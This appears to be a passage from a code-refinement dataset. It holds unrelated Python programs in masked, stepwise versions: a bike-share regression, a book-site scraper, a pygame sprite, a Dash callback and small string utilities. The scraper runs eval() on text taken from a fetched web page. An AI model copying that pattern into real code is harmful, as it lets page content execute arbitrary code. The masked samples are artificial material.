mean_squared_error\nfrom math import sqrt\n\n\ndef main():\n df = pandas.read_csv('2016Q1')\n df = df.append(pandas.read_csv('2016Q2'))\n df = df.append(pandas.read_csv('2016Q3'))\n df = df.append(pandas.read_csv('2016Q4'))\n test = pandas.read_csv('2017Q1')\n test = test.append(pandas.read_csv('2017Q2'))\n test = test.append(pandas.read_csv('2017Q3'))\n test = test.append(pandas.read_csv('2017Q4'))\n train_predict_1d(df, test)\n return\n\n\ndef make_scatter(df):\n plt.figure(figsize=(8, 6))\n plt.plot(df['Start station number'], df['Counts'], 'o')\n plt.xlabel('Station')\n plt.ylabel('Counts')\n plt.show()\n return\n\n\ndef train_predict_1d(df, test):\n regressor = DecisionTreeRegressor(max_depth=2)\n regressor.fit(np.array([df['Start station number']]).T, df['Counts'])\n xx = np.array([test['Start station number']]).T\n plt.figure(figsize=(8, 6))\n plt.plot(df['Start station number'], df['Counts'], 'o', label='observation'\n )\n plt.plot(xx, regressor.predict(xx), linewidth=4, alpha=0.7, label=\n 'prediction')\n plt.xlabel('Station')\n plt.ylabel('Counts')\n plt.legend()\n print('RMSE')\n print(sqrt(mean_squared_error(test['Counts'], regressor.predict(xx))))\n return\n\n\ndef train_predict_2d(df, test):\n regressor = DecisionTreeRegressor()\n regressor.fit(df[['Start station number', 'Quarter']], df['Counts'])\n nx = 30\n ny = 30\n x_station = np.linspace(30800, 32300, nx)\n y_day = np.linspace(0, 3, ny)\n xx, yy = np.meshgrid(x_station, y_day)\n z_counts = regressor.predict(np.array([xx.flatten(), yy.flatten()]).T)\n zz = np.reshape(z_counts, (nx, ny))\n fig = plt.figure(figsize=(8, 8))\n plt.pcolormesh(x_station, y_day, zz, cmap=plt.cm.YlOrRd)\n plt.colorbar(label='bikes predicted')\n plt.xlim(np.min(x_station), np.max(x_station))\n plt.ylim(np.min(y_day), np.max(y_day))\n plt.xlabel('Start station number')\n plt.ylabel('Quarter')\n print('Mean Absolute Error')\n print(mean_absolute_error(test['Counts'], regressor.predict(test[[\n 'Start station number', 'Quarter']])))\n print('RMSE')\n print(sqrt(mean_squared_error(test['Counts'], regressor.predict(test[[\n 'Start station number', 'Quarter']]))))\n return\n\n\nif __name__ == '__main__':\n main()\n", "step-5": "#!/usr/bin/env python3\n\nimport pandas\nfrom matplotlib import pyplot as plt\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import AdaBoostRegressor\nimport numpy as np\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error\nfrom math import sqrt\n\ndef main():\n df = pandas.read_csv(\"2016Q1\")\n df = df.append(pandas.read_csv(\"2016Q2\"))\n df = df.append(pandas.read_csv(\"2016Q3\"))\n df = df.append(pandas.read_csv(\"2016Q4\"))\n\n test = pandas.read_csv(\"2017Q1\")\n test = test.append(pandas.read_csv(\"2017Q2\"))\n test = test.append(pandas.read_csv(\"2017Q3\"))\n test = test.append(pandas.read_csv(\"2017Q4\"))\n #make_scatter(df)\n train_predict_1d(df, test)\n #train_predict_2d(df, test)\n return\n\ndef make_scatter(df):\n plt.figure(figsize=(8,6))\n plt.plot(df['Start station number'], df['Counts'], 'o')\n plt.xlabel('Station')\n plt.ylabel('Counts')\n plt.show()\n return\n\ndef train_predict_1d(df, test):\n regressor = DecisionTreeRegressor(max_depth=2)\n regressor.fit(np.array([df['Start station number']]).T, df['Counts'])\n \n xx = np.array([test['Start station number']]).T\n plt.figure(figsize=(8,6))\n plt.plot(df['Start station number'], df['Counts'], 'o', label='observation')\n plt.plot(xx, regressor.predict(xx), linewidth=4, alpha=.7, label='prediction')\n plt.xlabel('Station')\n plt.ylabel('Counts')\n plt.legend()\n #plt.show()\n\n print(\"RMSE\")\n print(sqrt(mean_squared_error(test['Counts'], regressor.predict(xx))))\n return\n\ndef train_predict_2d(df, test):\n #regressor = AdaBoostRegressor(DecisionTreeRegressor(max_depth=10), n_estimators=50, loss=\"square\")\n regressor = DecisionTreeRegressor()\n regressor.fit(df[['Start station number', 'Quarter']], df['Counts'])\n\n nx = 30\n ny = 30\n \n x_station = np.linspace(30800,32300, nx) \n y_day = np.linspace(0, 3, ny)\n xx, yy = np.meshgrid(x_station, y_day)\n\n z_counts = regressor.predict(np.array([xx.flatten(), yy.flatten()]).T)\n zz = np.reshape(z_counts, (nx, ny))\n\n fig = plt.figure(figsize=(8, 8))\n plt.pcolormesh(x_station, y_day, zz, cmap=plt.cm.YlOrRd)\n plt.colorbar(label='bikes predicted') \n #plt.scatter(test['Start station number'], test['Counts'], s=test['Counts']/25.0, c='g')\n plt.xlim(np.min(x_station), np.max(x_station))\n plt.ylim(np.min(y_day), np.max(y_day))\n plt.xlabel('Start station number')\n plt.ylabel('Quarter')\n #plt.show()\n #fig.savefig(\"2d_prediction_quarter\")\n\n print(\"Mean Absolute Error\")\n print(mean_absolute_error(test['Counts'], regressor.predict(test[['Start station number', 'Quarter']])))\n print(\"RMSE\")\n print(sqrt(mean_squared_error(test['Counts'], regressor.predict(test[['Start station number', 'Quarter']]))))\n\n return\n\nif __name__ == \"__main__\":\n main()\n", "step-ids": [ 3, 4, 5, 6, 7 ] }
[ 3, 4, 5, 6, 7 ]
import requests from bs4 import BeautifulSoup class Book: def __init__(self, url): self.url = url self.title = "" self.category = "" self.upc="" self.price_including_tax="" self.price_excluding_tax="" self.number_available="" self.description="" self.review_rating="" self.image_url="" self.tax="" def scrap(self): book = requests.get(self.url) soup = BeautifulSoup(book.content, "html.parser") self.__fill_title(soup) self.__fill_category(soup) self.__fill_upc(soup) self.__fill_price_including_tax(soup) self.__fill_price_excluding_tax(soup) self.__fill_number_available(soup) self.__fill_description(soup) self.__fill_review_rating(soup) self.__fill_image_url(soup) self.__fill_tax(soup) def __fill_title(self,soup): title = soup.find("div", {"class": "col-sm-6 product_main"}).find("h1") self.title= title.text # return self.title def __fill_category(self,soup): category = soup.findAll("li") category2 = category[2].text self.category = category2.replace("\n", "") # return self.category def __fill_upc(self,soup): tds = soup.findAll("td") self.upc = tds[0].text def __fill_price_including_tax(self,soup): tds = soup.findAll("td") self.price_including_tax = tds[3].text def __fill_price_excluding_tax(self,soup): tds = soup.findAll("td") self.price_excluding_tax = tds[2].text def __fill_number_available(self,soup): tds = soup.findAll("td") self.number_available = tds[5].text def __fill_description(self,soup): div = soup.find("div", class_="sub-header") p = div.find_next_sibling() self.description = p.text # return self.description def __fill_review_rating(self,soup): p = soup.find("div", {"class": "col-sm-6 product_main"}).find( "p", class_="star-rating" ) rating = str(p["class"]) star = rating[15:-1] star_rating = eval(star) return star_rating def __fill_image_url(self,soup): image = soup.find("div", {"class": "item active"}).find("img") image_url = image["src"] image_clean_url = image_url.replace("../../", "http://books.toscrape.com/") self.image_url = image_clean_url def __fill_tax(self,soup): tds = soup.findAll("td") self.tax = tds[4].text def __str__(self): output = f"url : {self.url} \ntitle : {self.title} \ncategory : {self.category} \nupc : {self.upc} \nprice_including_tax : {self.price_including_tax} \nprice_excluding_tax : {self.price_excluding_tax} \nnumber_available : {self.number_available} \ndescription : {self.description} \nreview_rating : {self.review_rating} \nimage_url : {self.image_url} \ntax : {self.tax} " return output # book = Book("http://books.toscrape.com/catalogue/a-light-in-the-attic_1000/index.html") # book.scrap("http://books.toscrape.com/catalogue/a-light-in-the-attic_1000/index.html") # print(book)
normal
{ "blob_id": "3dc83168264fbb4f9b0ab2980b845dffdc4417bb", "index": 7588, "step-1": "<mask token>\n\n\nclass Book:\n\n def __init__(self, url):\n self.url = url\n self.title = ''\n self.category = ''\n self.upc = ''\n self.price_including_tax = ''\n self.price_excluding_tax = ''\n self.number_available = ''\n self.description = ''\n self.review_rating = ''\n self.image_url = ''\n self.tax = ''\n\n def scrap(self):\n book = requests.get(self.url)\n soup = BeautifulSoup(book.content, 'html.parser')\n self.__fill_title(soup)\n self.__fill_category(soup)\n self.__fill_upc(soup)\n self.__fill_price_including_tax(soup)\n self.__fill_price_excluding_tax(soup)\n self.__fill_number_available(soup)\n self.__fill_description(soup)\n self.__fill_review_rating(soup)\n self.__fill_image_url(soup)\n self.__fill_tax(soup)\n <mask token>\n\n def __fill_category(self, soup):\n category = soup.findAll('li')\n category2 = category[2].text\n self.category = category2.replace('\\n', '')\n\n def __fill_upc(self, soup):\n tds = soup.findAll('td')\n self.upc = tds[0].text\n\n def __fill_price_including_tax(self, soup):\n tds = soup.findAll('td')\n self.price_including_tax = tds[3].text\n <mask token>\n <mask token>\n\n def __fill_description(self, soup):\n div = soup.find('div', class_='sub-header')\n p = div.find_next_sibling()\n self.description = p.text\n\n def __fill_review_rating(self, soup):\n p = soup.find('div', {'class': 'col-sm-6 product_main'}).find('p',\n class_='star-rating')\n rating = str(p['class'])\n star = rating[15:-1]\n star_rating = eval(star)\n return star_rating\n\n def __fill_image_url(self, soup):\n image = soup.find('div', {'class': 'item active'}).find('img')\n image_url = image['src']\n image_clean_url = image_url.replace('../../',\n 'http://books.toscrape.com/')\n self.image_url = image_clean_url\n\n def __fill_tax(self, soup):\n tds = soup.findAll('td')\n self.tax = tds[4].text\n\n def __str__(self):\n output = f\"\"\"url : {self.url} \ntitle : {self.title} \ncategory : {self.category} \nupc : {self.upc} \nprice_including_tax : {self.price_including_tax} \nprice_excluding_tax : {self.price_excluding_tax} \nnumber_available : {self.number_available} \ndescription : {self.description} \nreview_rating : {self.review_rating} \nimage_url : {self.image_url} \ntax : {self.tax} \"\"\"\n return output\n", "step-2": "<mask token>\n\n\nclass Book:\n\n def __init__(self, url):\n self.url = url\n self.title = ''\n self.category = ''\n self.upc = ''\n self.price_including_tax = ''\n self.price_excluding_tax = ''\n self.number_available = ''\n self.description = ''\n self.review_rating = ''\n self.image_url = ''\n self.tax = ''\n\n def scrap(self):\n book = requests.get(self.url)\n soup = BeautifulSoup(book.content, 'html.parser')\n self.__fill_title(soup)\n self.__fill_category(soup)\n self.__fill_upc(soup)\n self.__fill_price_including_tax(soup)\n self.__fill_price_excluding_tax(soup)\n self.__fill_number_available(soup)\n self.__fill_description(soup)\n self.__fill_review_rating(soup)\n self.__fill_image_url(soup)\n self.__fill_tax(soup)\n <mask token>\n\n def __fill_category(self, soup):\n category = soup.findAll('li')\n category2 = category[2].text\n self.category = category2.replace('\\n', '')\n\n def __fill_upc(self, soup):\n tds = soup.findAll('td')\n self.upc = tds[0].text\n\n def __fill_price_including_tax(self, soup):\n tds = soup.findAll('td')\n self.price_including_tax = tds[3].text\n <mask token>\n\n def __fill_number_available(self, soup):\n tds = soup.findAll('td')\n self.number_available = tds[5].text\n\n def __fill_description(self, soup):\n div = soup.find('div', class_='sub-header')\n p = div.find_next_sibling()\n self.description = p.text\n\n def __fill_review_rating(self, soup):\n p = soup.find('div', {'class': 'col-sm-6 product_main'}).find('p',\n class_='star-rating')\n rating = str(p['class'])\n star = rating[15:-1]\n star_rating = eval(star)\n return star_rating\n\n def __fill_image_url(self, soup):\n image = soup.find('div', {'class': 'item active'}).find('img')\n image_url = image['src']\n image_clean_url = image_url.replace('../../',\n 'http://books.toscrape.com/')\n self.image_url = image_clean_url\n\n def __fill_tax(self, soup):\n tds = soup.findAll('td')\n self.tax = tds[4].text\n\n def __str__(self):\n output = f\"\"\"url : {self.url} \ntitle : {self.title} \ncategory : {self.category} \nupc : {self.upc} \nprice_including_tax : {self.price_including_tax} \nprice_excluding_tax : {self.price_excluding_tax} \nnumber_available : {self.number_available} \ndescription : {self.description} \nreview_rating : {self.review_rating} \nimage_url : {self.image_url} \ntax : {self.tax} \"\"\"\n return output\n", "step-3": "<mask token>\n\n\nclass Book:\n\n def __init__(self, url):\n self.url = url\n self.title = ''\n self.category = ''\n self.upc = ''\n self.price_including_tax = ''\n self.price_excluding_tax = ''\n self.number_available = ''\n self.description = ''\n self.review_rating = ''\n self.image_url = ''\n self.tax = ''\n\n def scrap(self):\n book = requests.get(self.url)\n soup = BeautifulSoup(book.content, 'html.parser')\n self.__fill_title(soup)\n self.__fill_category(soup)\n self.__fill_upc(soup)\n self.__fill_price_including_tax(soup)\n self.__fill_price_excluding_tax(soup)\n self.__fill_number_available(soup)\n self.__fill_description(soup)\n self.__fill_review_rating(soup)\n self.__fill_image_url(soup)\n self.__fill_tax(soup)\n <mask token>\n\n def __fill_category(self, soup):\n category = soup.findAll('li')\n category2 = category[2].text\n self.category = category2.replace('\\n', '')\n\n def __fill_upc(self, soup):\n tds = soup.findAll('td')\n self.upc = tds[0].text\n\n def __fill_price_including_tax(self, soup):\n tds = soup.findAll('td')\n self.price_including_tax = tds[3].text\n\n def __fill_price_excluding_tax(self, soup):\n tds = soup.findAll('td')\n self.price_excluding_tax = tds[2].text\n\n def __fill_number_available(self, soup):\n tds = soup.findAll('td')\n self.number_available = tds[5].text\n\n def __fill_description(self, soup):\n div = soup.find('div', class_='sub-header')\n p = div.find_next_sibling()\n self.description = p.text\n\n def __fill_review_rating(self, soup):\n p = soup.find('div', {'class': 'col-sm-6 product_main'}).find('p',\n class_='star-rating')\n rating = str(p['class'])\n star = rating[15:-1]\n star_rating = eval(star)\n return star_rating\n\n def __fill_image_url(self, soup):\n image = soup.find('div', {'class': 'item active'}).find('img')\n image_url = image['src']\n image_clean_url = image_url.replace('../../',\n 'http://books.toscrape.com/')\n self.image_url = image_clean_url\n\n def __fill_tax(self, soup):\n tds = soup.findAll('td')\n self.tax = tds[4].text\n\n def __str__(self):\n output = f\"\"\"url : {self.url} \ntitle : {self.title} \ncategory : {self.category} \nupc : {self.upc} \nprice_including_tax : {self.price_including_tax} \nprice_excluding_tax : {self.price_excluding_tax} \nnumber_available : {self.number_available} \ndescription : {self.description} \nreview_rating : {self.review_rating} \nimage_url : {self.image_url} \ntax : {self.tax} \"\"\"\n return output\n", "step-4": "import requests\nfrom bs4 import BeautifulSoup\n\n\nclass Book:\n\n def __init__(self, url):\n self.url = url\n self.title = ''\n self.category = ''\n self.upc = ''\n self.price_including_tax = ''\n self.price_excluding_tax = ''\n self.number_available = ''\n self.description = ''\n self.review_rating = ''\n self.image_url = ''\n self.tax = ''\n\n def scrap(self):\n book = requests.get(self.url)\n soup = BeautifulSoup(book.content, 'html.parser')\n self.__fill_title(soup)\n self.__fill_category(soup)\n self.__fill_upc(soup)\n self.__fill_price_including_tax(soup)\n self.__fill_price_excluding_tax(soup)\n self.__fill_number_available(soup)\n self.__fill_description(soup)\n self.__fill_review_rating(soup)\n self.__fill_image_url(soup)\n self.__fill_tax(soup)\n\n def __fill_title(self, soup):\n title = soup.find('div', {'class': 'col-sm-6 product_main'}).find('h1')\n self.title = title.text\n\n def __fill_category(self, soup):\n category = soup.findAll('li')\n category2 = category[2].text\n self.category = category2.replace('\\n', '')\n\n def __fill_upc(self, soup):\n tds = soup.findAll('td')\n self.upc = tds[0].text\n\n def __fill_price_including_tax(self, soup):\n tds = soup.findAll('td')\n self.price_including_tax = tds[3].text\n\n def __fill_price_excluding_tax(self, soup):\n tds = soup.findAll('td')\n self.price_excluding_tax = tds[2].text\n\n def __fill_number_available(self, soup):\n tds = soup.findAll('td')\n self.number_available = tds[5].text\n\n def __fill_description(self, soup):\n div = soup.find('div', class_='sub-header')\n p = div.find_next_sibling()\n self.description = p.text\n\n def __fill_review_rating(self, soup):\n p = soup.find('div', {'class': 'col-sm-6 product_main'}).find('p',\n class_='star-rating')\n rating = str(p['class'])\n star = rating[15:-1]\n star_rating = eval(star)\n return star_rating\n\n def __fill_image_url(self, soup):\n image = soup.find('div', {'class': 'item active'}).find('img')\n image_url = image['src']\n image_clean_url = image_url.replace('../../',\n 'http://books.toscrape.com/')\n self.image_url = image_clean_url\n\n def __fill_tax(self, soup):\n tds = soup.findAll('td')\n self.tax = tds[4].text\n\n def __str__(self):\n output = f\"\"\"url : {self.url} \ntitle : {self.title} \ncategory : {self.category} \nupc : {self.upc} \nprice_including_tax : {self.price_including_tax} \nprice_excluding_tax : {self.price_excluding_tax} \nnumber_available : {self.number_available} \ndescription : {self.description} \nreview_rating : {self.review_rating} \nimage_url : {self.image_url} \ntax : {self.tax} \"\"\"\n return output\n", "step-5": "import requests\nfrom bs4 import BeautifulSoup\n\nclass Book:\n\n def __init__(self, url):\n self.url = url\n self.title = \"\"\n self.category = \"\"\n self.upc=\"\"\n self.price_including_tax=\"\"\n self.price_excluding_tax=\"\"\n self.number_available=\"\"\n self.description=\"\"\n self.review_rating=\"\"\n self.image_url=\"\"\n self.tax=\"\"\n \n def scrap(self): \n book = requests.get(self.url) \n soup = BeautifulSoup(book.content, \"html.parser\")\n self.__fill_title(soup) \n self.__fill_category(soup)\n self.__fill_upc(soup)\n self.__fill_price_including_tax(soup)\n self.__fill_price_excluding_tax(soup)\n self.__fill_number_available(soup)\n self.__fill_description(soup)\n self.__fill_review_rating(soup)\n self.__fill_image_url(soup)\n self.__fill_tax(soup)\n \n def __fill_title(self,soup): \n title = soup.find(\"div\", {\"class\": \"col-sm-6 product_main\"}).find(\"h1\")\n self.title= title.text\n # return self.title\n \n \n def __fill_category(self,soup):\n category = soup.findAll(\"li\")\n category2 = category[2].text\n self.category = category2.replace(\"\\n\", \"\")\n # return self.category\n\n def __fill_upc(self,soup):\n tds = soup.findAll(\"td\")\n self.upc = tds[0].text\n\n def __fill_price_including_tax(self,soup):\n tds = soup.findAll(\"td\")\n self.price_including_tax = tds[3].text\n\n def __fill_price_excluding_tax(self,soup):\n tds = soup.findAll(\"td\")\n self.price_excluding_tax = tds[2].text\n\n def __fill_number_available(self,soup):\n tds = soup.findAll(\"td\")\n self.number_available = tds[5].text\n\n def __fill_description(self,soup):\n div = soup.find(\"div\", class_=\"sub-header\")\n p = div.find_next_sibling()\n self.description = p.text\n # return self.description\n\n def __fill_review_rating(self,soup):\n p = soup.find(\"div\", {\"class\": \"col-sm-6 product_main\"}).find(\n \"p\", class_=\"star-rating\"\n )\n rating = str(p[\"class\"])\n star = rating[15:-1]\n star_rating = eval(star)\n return star_rating\n \n\n def __fill_image_url(self,soup):\n image = soup.find(\"div\", {\"class\": \"item active\"}).find(\"img\")\n image_url = image[\"src\"]\n image_clean_url = image_url.replace(\"../../\", \"http://books.toscrape.com/\")\n self.image_url = image_clean_url\n\n def __fill_tax(self,soup):\n tds = soup.findAll(\"td\")\n self.tax = tds[4].text\n\n def __str__(self):\n output = f\"url : {self.url} \\ntitle : {self.title} \\ncategory : {self.category} \\nupc : {self.upc} \\nprice_including_tax : {self.price_including_tax} \\nprice_excluding_tax : {self.price_excluding_tax} \\nnumber_available : {self.number_available} \\ndescription : {self.description} \\nreview_rating : {self.review_rating} \\nimage_url : {self.image_url} \\ntax : {self.tax} \"\n return output\n \n \n\n \n# book = Book(\"http://books.toscrape.com/catalogue/a-light-in-the-attic_1000/index.html\")\n# book.scrap(\"http://books.toscrape.com/catalogue/a-light-in-the-attic_1000/index.html\")\n# print(book)\n", "step-ids": [ 11, 12, 13, 15, 16 ] }
[ 11, 12, 13, 15, 16 ]
import pygame from pygame.sprite import Sprite import spritesheet class Bunker(Sprite): def __init__(self, ai_settings, bunker_x, bunker_y, screen, images): """Initialize the ship and set its starting position""" super(Bunker, self).__init__() self.screen = screen self.images = images self.image = self.images[18] self.rect = self.image.get_rect() self.screen_rect = screen.get_rect() # Start each new bunker at the bottom of the screen self.rect.centerx = bunker_x self.rect.bottom = bunker_y # Store a decimal value for the ship's center. #self.center = float(self.rect.centerx) self.bunker_health = 5 def update(self): """Track the HP of the bunker""" if self.bunker_health == 0: self.kill() def blitme(self): """Draw the ship at its current location""" self.screen.blit(self.image, self.rect)
normal
{ "blob_id": "d088aadc4d88267b908c4f6de2928c812ef36739", "index": 1603, "step-1": "<mask token>\n\n\nclass Bunker(Sprite):\n <mask token>\n <mask token>\n\n def blitme(self):\n \"\"\"Draw the ship at its current location\"\"\"\n self.screen.blit(self.image, self.rect)\n", "step-2": "<mask token>\n\n\nclass Bunker(Sprite):\n\n def __init__(self, ai_settings, bunker_x, bunker_y, screen, images):\n \"\"\"Initialize the ship and set its starting position\"\"\"\n super(Bunker, self).__init__()\n self.screen = screen\n self.images = images\n self.image = self.images[18]\n self.rect = self.image.get_rect()\n self.screen_rect = screen.get_rect()\n self.rect.centerx = bunker_x\n self.rect.bottom = bunker_y\n self.bunker_health = 5\n <mask token>\n\n def blitme(self):\n \"\"\"Draw the ship at its current location\"\"\"\n self.screen.blit(self.image, self.rect)\n", "step-3": "<mask token>\n\n\nclass Bunker(Sprite):\n\n def __init__(self, ai_settings, bunker_x, bunker_y, screen, images):\n \"\"\"Initialize the ship and set its starting position\"\"\"\n super(Bunker, self).__init__()\n self.screen = screen\n self.images = images\n self.image = self.images[18]\n self.rect = self.image.get_rect()\n self.screen_rect = screen.get_rect()\n self.rect.centerx = bunker_x\n self.rect.bottom = bunker_y\n self.bunker_health = 5\n\n def update(self):\n \"\"\"Track the HP of the bunker\"\"\"\n if self.bunker_health == 0:\n self.kill()\n\n def blitme(self):\n \"\"\"Draw the ship at its current location\"\"\"\n self.screen.blit(self.image, self.rect)\n", "step-4": "import pygame\nfrom pygame.sprite import Sprite\nimport spritesheet\n\n\nclass Bunker(Sprite):\n\n def __init__(self, ai_settings, bunker_x, bunker_y, screen, images):\n \"\"\"Initialize the ship and set its starting position\"\"\"\n super(Bunker, self).__init__()\n self.screen = screen\n self.images = images\n self.image = self.images[18]\n self.rect = self.image.get_rect()\n self.screen_rect = screen.get_rect()\n self.rect.centerx = bunker_x\n self.rect.bottom = bunker_y\n self.bunker_health = 5\n\n def update(self):\n \"\"\"Track the HP of the bunker\"\"\"\n if self.bunker_health == 0:\n self.kill()\n\n def blitme(self):\n \"\"\"Draw the ship at its current location\"\"\"\n self.screen.blit(self.image, self.rect)\n", "step-5": "import pygame\nfrom pygame.sprite import Sprite\nimport spritesheet\n\nclass Bunker(Sprite):\n\n def __init__(self, ai_settings, bunker_x, bunker_y, screen, images):\n \"\"\"Initialize the ship and set its starting position\"\"\"\n super(Bunker, self).__init__()\n self.screen = screen\n self.images = images\n\n self.image = self.images[18]\n\n self.rect = self.image.get_rect()\n self.screen_rect = screen.get_rect()\n\n # Start each new bunker at the bottom of the screen\n self.rect.centerx = bunker_x\n self.rect.bottom = bunker_y\n\n # Store a decimal value for the ship's center.\n #self.center = float(self.rect.centerx)\n\n self.bunker_health = 5\n\n def update(self):\n \"\"\"Track the HP of the bunker\"\"\"\n if self.bunker_health == 0:\n self.kill()\n\n def blitme(self):\n \"\"\"Draw the ship at its current location\"\"\"\n self.screen.blit(self.image, self.rect)\n\n\n", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
import dash_core_components as dcc import dash_html_components as html from dash.dependencies import Input, Output from app import app layout = html.Div([ html.H3('Node 6'), dcc.Dropdown( id='node-6-dropdown', options=[ {'label': 'Node 6 - {}'.format(i), 'value': i} for i in [ 'NYC', 'MTL', 'LA' ] ] ), html.Div(id='node-6-display-value'), ]) @app.callback( Output('node-6-display-value', 'children'), [Input('node-6-dropdown', 'value')]) def display_value(value): return 'You have selected "{}"'.format(value)
normal
{ "blob_id": "632b90ea5a2ac35539e589af297c04b31bbf02d0", "index": 3443, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\[email protected](Output('node-6-display-value', 'children'), [Input(\n 'node-6-dropdown', 'value')])\ndef display_value(value):\n return 'You have selected \"{}\"'.format(value)\n", "step-3": "<mask token>\nlayout = html.Div([html.H3('Node 6'), dcc.Dropdown(id='node-6-dropdown',\n options=[{'label': 'Node 6 - {}'.format(i), 'value': i} for i in ['NYC',\n 'MTL', 'LA']]), html.Div(id='node-6-display-value')])\n\n\[email protected](Output('node-6-display-value', 'children'), [Input(\n 'node-6-dropdown', 'value')])\ndef display_value(value):\n return 'You have selected \"{}\"'.format(value)\n", "step-4": "import dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nfrom app import app\nlayout = html.Div([html.H3('Node 6'), dcc.Dropdown(id='node-6-dropdown',\n options=[{'label': 'Node 6 - {}'.format(i), 'value': i} for i in ['NYC',\n 'MTL', 'LA']]), html.Div(id='node-6-display-value')])\n\n\[email protected](Output('node-6-display-value', 'children'), [Input(\n 'node-6-dropdown', 'value')])\ndef display_value(value):\n return 'You have selected \"{}\"'.format(value)\n", "step-5": "import dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Input, Output\r\n\r\nfrom app import app\r\n\r\nlayout = html.Div([\r\n html.H3('Node 6'),\r\n dcc.Dropdown(\r\n id='node-6-dropdown',\r\n options=[\r\n {'label': 'Node 6 - {}'.format(i), 'value': i} for i in [\r\n 'NYC', 'MTL', 'LA'\r\n ]\r\n ]\r\n ),\r\n html.Div(id='node-6-display-value'),\r\n\r\n])\r\n\r\n\r\[email protected](\r\n Output('node-6-display-value', 'children'),\r\n [Input('node-6-dropdown', 'value')])\r\ndef display_value(value):\r\n return 'You have selected \"{}\"'.format(value)\r\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
valor1=input("Ingrese Primera Cantidad ") valor2=input("Ingrese Segunda Cantidad ") Total = valor1 + valor2 print "El total es: " + str(Total)
normal
{ "blob_id": "5c179752f4c4e1d693346c6edddd79211a895735", "index": 8685, "step-1": "valor1=input(\"Ingrese Primera Cantidad \")\nvalor2=input(\"Ingrese Segunda Cantidad \")\nTotal = valor1 + valor2\nprint \"El total es: \" + str(Total)\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
#!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import print_function, with_statement """ cosi299a- Cinderella [email protected] """ def truecase_is(string): """ -> lower/title/upper/other """ if string.islower(): return 'l' if string.istitle(): return 't' if string.isupper(): return 'u' return 'o' def alnum_is(string): """ -> alpha/digit/other """ #assumption: only alnum strings analyzed if string.isalpha(): return 'a' if string.isdigit(): return 'd' return 'o' def truecase_matching_is(str1, str2): """ -> f(ull-string)/s(ub-string)/n(one) """ if str1==str2: return 'f' if str1 in str2: return 's' return 'n' def lowercase_matching_is(str1, str2): return truecase_matching_is(str1.lower(),str2.lower())
normal
{ "blob_id": "75ddcdd4e80b962198ff9de1d996837927c3ac1a", "index": 824, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef truecase_is(string):\n \"\"\" -> lower/title/upper/other \"\"\"\n if string.islower():\n return 'l'\n if string.istitle():\n return 't'\n if string.isupper():\n return 'u'\n return 'o'\n\n\n<mask token>\n\n\ndef truecase_matching_is(str1, str2):\n \"\"\" -> f(ull-string)/s(ub-string)/n(one) \"\"\"\n if str1 == str2:\n return 'f'\n if str1 in str2:\n return 's'\n return 'n'\n\n\ndef lowercase_matching_is(str1, str2):\n return truecase_matching_is(str1.lower(), str2.lower())\n", "step-3": "<mask token>\n\n\ndef truecase_is(string):\n \"\"\" -> lower/title/upper/other \"\"\"\n if string.islower():\n return 'l'\n if string.istitle():\n return 't'\n if string.isupper():\n return 'u'\n return 'o'\n\n\ndef alnum_is(string):\n \"\"\" -> alpha/digit/other \"\"\"\n if string.isalpha():\n return 'a'\n if string.isdigit():\n return 'd'\n return 'o'\n\n\ndef truecase_matching_is(str1, str2):\n \"\"\" -> f(ull-string)/s(ub-string)/n(one) \"\"\"\n if str1 == str2:\n return 'f'\n if str1 in str2:\n return 's'\n return 'n'\n\n\ndef lowercase_matching_is(str1, str2):\n return truecase_matching_is(str1.lower(), str2.lower())\n", "step-4": "from __future__ import print_function, with_statement\n<mask token>\n\n\ndef truecase_is(string):\n \"\"\" -> lower/title/upper/other \"\"\"\n if string.islower():\n return 'l'\n if string.istitle():\n return 't'\n if string.isupper():\n return 'u'\n return 'o'\n\n\ndef alnum_is(string):\n \"\"\" -> alpha/digit/other \"\"\"\n if string.isalpha():\n return 'a'\n if string.isdigit():\n return 'd'\n return 'o'\n\n\ndef truecase_matching_is(str1, str2):\n \"\"\" -> f(ull-string)/s(ub-string)/n(one) \"\"\"\n if str1 == str2:\n return 'f'\n if str1 in str2:\n return 's'\n return 'n'\n\n\ndef lowercase_matching_is(str1, str2):\n return truecase_matching_is(str1.lower(), str2.lower())\n", "step-5": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nfrom __future__ import print_function, with_statement\n\n\n\"\"\"\ncosi299a- Cinderella\[email protected]\n\"\"\"\n\ndef truecase_is(string):\n \"\"\" -> lower/title/upper/other \"\"\"\n if string.islower():\n return 'l'\n if string.istitle():\n return 't'\n if string.isupper():\n return 'u'\n return 'o'\n\ndef alnum_is(string):\n \"\"\" -> alpha/digit/other \"\"\" #assumption: only alnum strings analyzed\n if string.isalpha():\n return 'a'\n if string.isdigit():\n return 'd'\n return 'o'\n\ndef truecase_matching_is(str1, str2):\n \"\"\" -> f(ull-string)/s(ub-string)/n(one) \"\"\"\n if str1==str2:\n return 'f'\n if str1 in str2:\n return 's'\n return 'n'\n\ndef lowercase_matching_is(str1, str2):\n return truecase_matching_is(str1.lower(),str2.lower())\n", "step-ids": [ 0, 3, 4, 5, 6 ] }
[ 0, 3, 4, 5, 6 ]
from .personal_questions import * from .survey_questions import *
normal
{ "blob_id": "a8f2d527e9824d3986f4bb49c3cc75fd0d999bf7", "index": 3290, "step-1": "<mask token>\n", "step-2": "from .personal_questions import *\nfrom .survey_questions import *\n", "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0, 1 ] }
[ 0, 1 ]
